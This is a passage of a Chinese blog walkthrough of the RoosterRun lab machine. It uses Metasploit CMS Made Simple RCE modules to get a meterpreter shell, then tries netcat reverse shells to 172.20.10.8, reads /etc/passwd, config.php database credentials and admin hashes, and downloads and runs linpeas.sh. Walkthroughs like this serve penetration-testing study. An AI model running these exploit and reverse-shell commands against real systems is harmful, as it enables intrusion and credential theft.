exploit(multi\/http\/cmsms_upload_rename_rce) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; show options\n\nModule options (exploit\/multi\/http\/cmsms_upload_rename_rce):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   PASSWORD   homeandaway      yes       Password to authenticate with\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS     172.20.10.3      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/cmsms\/          yes       Base cmsms directory path\n   USERNAME   admin            yes       Username to authenticate with\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  172.20.10.8      yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Universal\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; set targeturi \/\ntargeturi =&gt; \/\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; r\n[-] Unknown command: r\nmsf6 exploit(multi\/http\/cmsms_upload_rename_rce) &gt; run\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)\n[!] The service is running, but could not be validated.\n[*] Sending stage (39927 bytes) to 172.20.10.3\n[+] Deleted ZVVOEfQY.php\n[*] Meterpreter session 1 opened (172.20.10.8:4444 -&gt; 172.20.10.3:52598) at 2024-04-05 03:02:53 -0400\nwhoami;id\n[!] This exploit may require manual cleanup of &#039;ZVVOEfQY.txt&#039; on the target\n\nmeterpreter &gt; whoami;id\n[-] Unknown command: whoami;id\nmeterpreter &gt; ls\nListing: \/var\/www\/html\/uploads\n==============================\n\nMode              Size  Type  Last modified              Name\n----              ----  ----  -------------              ----\n040755\/rwxr-xr-x  4096  dir   2023-09-20 01:28:33 -0400  NCleanBlue\n040755\/rwxr-xr-x  4096  dir   2024-04-05 03:03:14 -0400  images\n100644\/rw-r--r--  0     fil   2023-09-20 01:28:33 -0400  index.html\n040755\/rwxr-xr-x  4096  dir   2023-09-20 01:28:33 -0400  ngrey\n040755\/rwxr-xr-x  4096  dir   2023-09-20 01:28:33 -0400  simplex\n\nmeterpreter &gt; cd \/tmp\nmeterpreter &gt; shell\nProcess 3032 created.\nChannel 0 created.\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nscript \/dev\/null -c bash                \nScript started, output log file is &#039;\/dev\/null&#039;.\nwww-data@rooSter-Run:\/tmp$ nc -e 172.20.10.8 1234\nnc -e 172.20.10.8 1234\nno port[s] to connect to\nnc -e \/bin\/bash 172.20.10.8 1234\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\nhostname: Name or service not known\nbash: line 12: ifconfig: command not found<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840358.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840358.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405150906542\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u53e6\u4e00\u4e2a\u6211\u4eec\u627e\u5230\u7684\u884c\u4e0d\u884c\uff1a<\/p>\n<h4>cmsms_object_injection_rce<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/roosterrun]\n\u2514\u2500$ msfconsole           \nMetasploit tip: The use command supports fuzzy searching to try and \nselect the intended module, e.g. use kerberos\/get_ticket or use \nkerberos forge silver ticket\n\n      .:okOOOkdc&#039;           &#039;cdkOOOko:.\n    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.\n   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:\n  &#039;OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO&#039;\n  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo\n  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx\n  lOOOOOOOO.         ;d;         ,OOOOOOOOl\n  .OOOOOOOO.   .;           ;    ,OOOOOOOO.\n   cOOOOOOO.   .OOc.     &#039;oOO.   ,OOOOOOOc\n    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo\n     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl\n      ;OOOO&#039;   .OOOO.   :OOOO.   ;OOOO;\n       .dOOo   .OOOOocccxOOOO.   xOOd.\n         ,kOl  .OOOOOOOOOOOOO. .dOk,\n           :kk;.OOOOOOOOOOOOO.cOk:\n             ;kOOOOOOOOOOOOOOOk:\n               ,xOOOOOOOOOOOx,\n                 .lOOOOOOOl.\n                    ,dOd,\n                      .\n\n       =[ metasploit v6.3.55-dev                          ]\n+ -- --=[ 2397 exploits - 1235 auxiliary - 422 post       ]\n+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 &gt; search cms made simple \n\nMatching Modules\n================\n\n   #  Name                                           Disclosure Date  Rank       Check  Description\n   -  ----                                           ---------------  ----       -----  -----------\n   0  exploit\/multi\/http\/cmsms_showtime2_rce         2019-03-11       normal     Yes    CMS Made Simple (CMSMS) Showtime2 File Upload RCE\n   1  exploit\/multi\/http\/cmsms_upload_rename_rce     2018-07-03       excellent  Yes    CMS Made Simple Authenticated RCE via File Upload\/Copy\n   2  exploit\/multi\/http\/cmsms_object_injection_rce  2019-03-26       normal     Yes    CMS Made Simple Authenticated RCE via object injection\n\nInteract with a module by name or index. For example info 2, use 2 or use exploit\/multi\/http\/cmsms_object_injection_rce\n\nmsf6 &gt; use 2\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; show options\n\nModule options (exploit\/multi\/http\/cmsms_object_injection_rce):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   PASSWORD                    yes       Password to authenticate with\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/                yes       Base cmsms directory path\n   USERNAME                    yes       Username to authenticate with\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; set password homeandaway\npassword =&gt; homeandaway\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; set username admin\nusername =&gt; admin\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; show options\n\nModule options (exploit\/multi\/http\/cmsms_object_injection_rce):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   PASSWORD   homeandaway      yes       Password to authenticate with\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS     172.20.10.3      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/                yes       Base cmsms directory path\n   USERNAME   admin            yes       Username to authenticate with\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  172.20.10.8      yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/http\/cmsms_object_injection_rce) &gt; exploit\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)\n[+] The target appears to be vulnerable.\n[*] Sending stage (39927 bytes) to 172.20.10.3\n[+] Deleted TUcQplymn.php\n[*] Meterpreter session 1 opened (172.20.10.8:4444 -&gt; 172.20.10.3:37758) at 2024-04-05 03:12:25 -0400\n\nmeterpreter &gt; cd \/tmp\nmeterpreter &gt; shell\nProcess 3244 created.\nChannel 0 created.\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nscript \/dev\/null -c bash \nScript started, output log file is &#039;\/dev\/null&#039;.\nwww-data@rooSter-Run:\/tmp$ nc -e bash 172.20.10.8 1234\nnc -e bash 172.20.10.8 1234\nexec bash failed : No such file or directory\nwww-data@rooSter-Run:\/tmp$ nc -e \/bin\/bash 172.20.10.8 1234\nnc -e \/bin\/bash 172.20.10.8 1234\n(UNKNOWN) [172.20.10.8] 1234 (?) : Connection refused\nwww-data@rooSter-Run:\/tmp$ nc -e \/bin\/bash 172.20.10.8 1234\nnc -e \/bin\/bash 172.20.10.8 1234\nscript: unexpected number of arguments\nTry &#039;script --help&#039; for more information.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840359.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840359.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405151709672\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e5f\u662f\u53ef\u4ee5\u7684\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u5148\u6539\u5584\u4e00\u4e0b\u73af\u5883\u95ee\u9898\uff1a<\/p>\n<pre><code class=\"language-bash\">script \/dev\/null -c bash\nctrl+z\nstty raw -echo;fg\nreset xterm\nexport XTERM=xterm-256color\nstty rows 55 columns 209 \nsource \/etc\/skel\/.bashrc<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">www-data@rooSter-Run:\/tmp$ ls -la\nls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 Apr  5 09:03 .\ndrwxr-xr-x 18 root root 4096 Jul 22  2023 ..\nwww-data@rooSter-Run:\/tmp$ cd \/var\/   \ncd \/var\/\nwww-data@rooSter-Run:\/var$ ls -la\nls -la\ntotal 48\ndrwxr-xr-x 12 root root  4096 Sep 20  2023 .\ndrwxr-xr-x 18 root root  4096 Jul 22  2023 ..\ndrwxr-xr-x  2 root root  4096 Apr  5 07:10 backups\ndrwxr-xr-x 11 root root  4096 Sep 20  2023 cache\ndrwxr-xr-x 27 root root  4096 Sep 20  2023 lib\ndrwxrwsr-x  2 root staff 4096 Mar  2  2023 local\nlrwxrwxrwx  1 root root     9 Jun 15  2023 lock -&gt; \/run\/lock\ndrwxr-xr-x  8 root root  4096 Apr  5 06:41 log\ndrwxrwsr-x  2 root mail  4096 Jun 15  2023 mail\ndrwxr-xr-x  2 root root  4096 Jun 15  2023 opt\nlrwxrwxrwx  1 root root     4 Jun 15  2023 run -&gt; \/run\ndrwxr-xr-x  4 root root  4096 Jun 15  2023 spool\ndrwxrwxrwt  2 root root  4096 Apr  5 06:41 tmp\ndrwxr-xr-x  3 root root  4096 Sep 20  2023 www\nwww-data@rooSter-Run:\/var$ mail\nmail\nbash: mail: command not found\nwww-data@rooSter-Run:\/var$ cd www;ls -la\ncd www;ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Sep 20  2023 .\ndrwxr-xr-x 12 root     root     4096 Sep 20  2023 ..\ndrwxr-xr-x  9 www-data www-data 4096 Sep 20  2023 html\nwww-data@rooSter-Run:\/var\/www$ cd html\ncd html\nwww-data@rooSter-Run:\/var\/www\/html$ ls -la\nls -la\ntotal 60\ndrwxr-xr-x  9 www-data www-data  4096 Sep 20  2023 .\ndrwxr-xr-x  3 root     root      4096 Sep 20  2023 ..\ndrwxr-xr-x  6 www-data www-data  4096 Apr  5 09:12 admin\ndrwxr-xr-x  9 www-data www-data  4096 Sep 20  2023 assets\n-r--r--r--  1 www-data www-data   384 Sep 20  2023 config.php\ndrwxr-xr-x  2 www-data www-data  4096 Sep 20  2023 doc\n-rw-r--r--  1 www-data www-data  1150 Sep 20  2023 favicon_cms.ico\n-rw-r--r--  1 www-data www-data 12050 Sep 20  2023 index.php\ndrwxr-xr-x 11 www-data www-data  4096 Sep 20  2023 lib\n-rw-r--r--  1 www-data www-data   959 Sep 20  2023 moduleinterface.php\ndrwxr-xr-x 15 www-data www-data  4096 Sep 20  2023 modules\ndrwxr-xr-x  4 www-data www-data  4096 Sep 20  2023 tmp\ndrwxr-xr-x  6 www-data www-data  4096 Apr  5 09:03 uploads\nwww-data@rooSter-Run:\/var\/www\/html$ cat config.php\ncat config.php\n&lt;?php\n# CMS Made Simple Configuration File\n# Documentation: https:\/\/docs.cmsmadesimple.org\/configuration\/config-file\/config-reference\n#\n$config[&#039;dbms&#039;] = &#039;mysqli&#039;;\n$config[&#039;db_hostname&#039;] = &#039;localhost&#039;;\n$config[&#039;db_username&#039;] = &#039;admin&#039;;\n$config[&#039;db_password&#039;] = &#039;j42W9kDq9dN9hK&#039;;\n$config[&#039;db_name&#039;] = &#039;cmsms_db&#039;;\n$config[&#039;db_prefix&#039;] = &#039;cms_&#039;;\n$config[&#039;timezone&#039;] = &#039;Europe\/Berlin&#039;;\n?&gt;www-data@rooSter-Run:\/var\/www\/html$ cd doc;ls -la\ncd doc;ls -la\ntotal 100\ndrwxr-xr-x 2 www-data www-data  4096 Sep 20  2023 .\ndrwxr-xr-x 9 www-data www-data  4096 Sep 20  2023 ..\n-rw-r--r-- 1 www-data www-data   418 Sep 20  2023 .htaccess\n-rw-r--r-- 1 www-data www-data  4981 Sep 20  2023 AUTHORS.txt\n-rw-r--r-- 1 www-data www-data 42369 Sep 20  2023 CHANGELOG.txt\n-rw-r--r-- 1 www-data www-data 17992 Sep 20  2023 COPYING.txt\n-rw-r--r-- 1 www-data www-data   920 Sep 20  2023 README.txt\n-rw-r--r-- 1 www-data www-data  4045 Sep 20  2023 htaccess.txt\n-rw-r--r-- 1 www-data www-data    24 Sep 20  2023 index.html\n-rw-r--r-- 1 www-data www-data   121 Sep 20  2023 robots.txt\nwww-data@rooSter-Run:\/var\/www\/html\/doc$ cd \/            \ncd \/\nwww-data@rooSter-Run:\/$ cat \/etc\/passwd\ncat \/etc\/passwd\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\nmatthieu:x:1000:1000:,,,:\/home\/matthieu:\/bin\/zsh\nwww-data@rooSter-Run:\/$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\nwww-data@rooSter-Run:\/$ cd \/home\ncd \/home\nwww-data@rooSter-Run:\/home$ ls\nls\nmatthieu\nwww-data@rooSter-Run:\/home$ cd matthieu\ncd matthieu\nwww-data@rooSter-Run:\/home\/matthieu$ ls -la\nls -la\ntotal 40\ndrwxr-xr-x  4 matthieu matthieu 4096 Apr  5 06:41 .\ndrwxr-xr-x  3 root     root     4096 Sep 24  2023 ..\nlrwxrwxrwx  1 root     root        9 Sep 24  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 matthieu matthieu  220 Sep 22  2023 .bash_logout\n-rw-r--r--  1 matthieu matthieu 3526 Sep 22  2023 .bashrc\ndrwxr-xr-x  3 matthieu matthieu 4096 Sep 22  2023 .local\ndrwxr-xr-x 12 matthieu matthieu 4096 Sep 22  2023 .oh-my-zsh\n-rw-r--r--  1 matthieu matthieu  807 Sep 22  2023 .profile\n-rw-r--r--  1 matthieu matthieu 3915 Sep 22  2023 .zshrc\n-rwxr-xr-x  1 matthieu matthieu  302 Sep 23  2023 StaleFinder\n-rwx------  1 matthieu matthieu   33 Sep 24  2023 user.txt\nwww-data@rooSter-Run:\/home\/matthieu$ file StaleFinder\nfile StaleFinder\nStaleFinder: Bourne-Again shell script, ASCII text executable\nwww-data@rooSter-Run:\/home\/matthieu$ cat StaleFinder \n#!\/usr\/bin\/env bash\n\nfor file in ~\/*; do\n    if [[ -f $file ]]; then\n        if [[ ! -s $file ]]; then\n            echo &quot;$file is empty.&quot;\n        fi\n\n        if [[ $(find &quot;$file&quot; -mtime +365 -print) ]]; then\n            echo &quot;$file hasn&#039;t been modified for over a year.&quot;\n        fi\n    fi\ndone<\/code><\/pre>\n<p>\u627e\u5230\u6570\u636e\u5e93\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">admin\nj42W9kDq9dN9hK<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5207\u6362root\uff0c\u76f4\u63a5\u7528\u8fd9\u4e2a\u5bc6\u7801\uff0c\u4f46\u662f\u5931\u8d25\uff0c\u4e56\u4e56\u5c1d\u8bd5\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">www-data@rooSter-Run:\/home\/matthieu$ mysql -u admin -p \nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 55604\nServer version: 10.11.3-MariaDB-1 Debian 12\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB [(none)]&gt; show databases\n    -&gt; ;\n+--------------------+\n| Database           |\n+--------------------+\n| cmsms_db           |\n| information_schema |\n+--------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [(none)]&gt; use information_schema;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [information_schema]&gt; show tables;\n........\n79 rows in set (0.000 sec)\n\nMariaDB [information_schema]&gt; select * from user_variables;\nEmpty set (0.000 sec)\n\nMariaDB [information_schema]&gt; use cmsms_db;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [cmsms_db]&gt; show tables;\n.........\n53 rows in set (0.000 sec)\n\nMariaDB [cmsms_db]&gt; select * from cms_users;\n+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+\n| user_id | username | password                         | admin_access | first_name | last_name | email               | active | create_date         | modified_date       |\n+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+\n|       1 | admin    | 4f943036486b9ad48890b2efbf7735a8 |            1 |            |           | admin@localhost.com |      1 | 2023-09-20 07:28:39 | 2023-09-20 07:31:54 |\n+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+\n1 row in set (0.000 sec)<\/code><\/pre>\n<p>\u6ca1\u4e1c\u897f\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u522b\u7684\u76ee\u5f55\uff0c\u4ee5\u53casuid\u90fd\u6ca1\u5565\u53d1\u73b0\uff0c\u4e0a\u4f20<code>linpeas.sh<\/code>\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\"># kali\npython3 -m http.server 8888\n# roosterrun\ncd \/tmp\nwget http:\/\/172.20.10.8:8888\/linpeas.sh;chmod +x linpeas.sh;.\/linpeas.sh<\/code><\/pre>\n<p>\u7b49\u7684\u529f\u592b\u6211\u4eec\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/usr\/bin\/env bash\n\nfor file in ~\/*; do\n    if [[ -f $file ]]; then                 # \u68c0\u67e5 $file \u662f\u5426\u662f\u4e00\u4e2a\u666e\u901a\u6587\u4ef6\n        if [[ ! -s $file ]]; then           # \u68c0\u67e5 $file \u662f\u5426\u4e3a\u7a7a\n            echo &quot;$file is empty.&quot;\n        fi\n\n        if [[ $(find &quot;$file&quot; -mtime +365 -print) ]]; then      # \u67e5\u627e\u5728\u8fc7\u53bb\u4e00\u5e74\u4e2d\u6ca1\u6709\u88ab\u4fee\u6539\u8fc7\u7684\u6587\u4ef6\n            echo &quot;$file hasn&#039;t been modified for over a year.&quot;\n        fi\n    fi\ndone<\/code><\/pre>\n<p><code>linpeas.sh<\/code>\u8fd0\u884c\u5b8c\u4e86\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840360.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405153938675\" style=\"zoom:50%;\" \/><\/div><\/p>\n<blockquote>\n<p>&quot;File with ACLs&quot; \u662f\u6307\u4e00\u4e2a\u6587\u4ef6\u88ab\u5206\u914d\u4e86\u8bbf\u95ee\u63a7\u5236\u5217\u8868\uff08Access Control Lists\uff0c\u7b80\u79f0ACLs\uff09\u3002ACLs\u662f\u8ba1\u7b97\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7528\u6765\u5b9a\u4e49\u54ea\u4e9b\u7528\u6237\u6216\u7cfb\u7edf\u8fdb\u7a0b\u53ef\u4ee5\u5bf9\u7279\u5b9a\u7684\u6587\u4ef6\u3001\u76ee\u5f55\u6216\u5176\u4ed6\u8d44\u6e90\u6267\u884c\u54ea\u4e9b\u64cd\u4f5c\u7684\u4e00\u79cd\u673a\u5236\u3002<\/p>\n<p>\u5177\u4f53\u6765\u8bf4\uff0cACLs \u53ef\u4ee5\u4e3a\u7279\u5b9a\u7684\u7528\u6237\u6216\u7528\u6237\u7ec4\u5206\u914d\u4e0d\u540c\u7684\u6743\u9650\uff0c\u4f8b\u5982\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u7b49\u3002\u8fd9\u79cd\u673a\u5236\u63d0\u4f9b\u4e86\u6bd4\u4f20\u7edf\u7684\u201c\u6240\u6709\u8005-\u7ec4-\u5176\u4ed6\u201d\u6743\u9650\u6a21\u578b\u66f4\u7ec6\u7c92\u5ea6\u7684\u63a7\u5236\u3002\u901a\u8fc7ACLs\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u7cbe\u786e\u5730\u63a7\u5236\u54ea\u4e9b\u7528\u6237\u6216\u7528\u6237\u7ec4\u53ef\u4ee5\u8bbf\u95ee\u6216\u4fee\u6539\u7279\u5b9a\u7684\u6587\u4ef6\u6216\u76ee\u5f55\u3002<\/p>\n<p>ACLs \u5728\u8bb8\u591a\u73b0\u4ee3\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u90fd\u6709\u5b9e\u73b0\uff0c\u4f8b\u5982 Windows\u3001macOS \u548c\u4e00\u4e9b Unix-like \u7cfb\u7edf\uff08\u901a\u8fc7\u7279\u5b9a\u7684\u6587\u4ef6\u7cfb\u7edf\u6216\u6269\u5c55\uff09\u3002<\/p>\n<p>\u4f7f\u7528 ACLs 